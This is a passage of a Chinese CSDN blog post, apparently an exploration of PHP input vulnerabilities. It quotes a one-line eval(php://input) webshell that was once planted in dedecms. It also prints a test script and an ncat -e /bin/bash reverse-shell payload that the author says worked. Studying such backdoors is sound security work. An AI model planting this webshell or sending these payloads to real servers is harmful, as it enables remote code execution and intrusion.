php input 漏洞,php://input,php://filter,data URI schema的那些事

本文详细探讨了PHP输入漏洞,包括php://input用于接收POST数据实现一句话木马,如何将文件包含漏洞转化为代码执行漏洞,以及data URI schema在绕过WAF中的应用。同时,还介绍了php://filter在文件包含漏洞中的利用,用于读取PHP文件源码。
摘要由CSDN通过智能技术生成

一、php://input一句话木马

在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)

@eval(file_get_contents('php://input'))

我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://input的功能。

$data=file_get_contents('php://input');

echo $data."
";

//@eval(file_get_contents('php://input'))

?>

发现php://input是用来接收post数据(这里有php://input的介绍)

112a3dccec392337014ad934cc7a04ce.png

注释掉phpinput.php的打印语句

使用firefox的hackbar提交上图显示的post data:

system('ncat -e /bin/bash localhost 1234');

测试了一下nc反弹shell的利用,成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值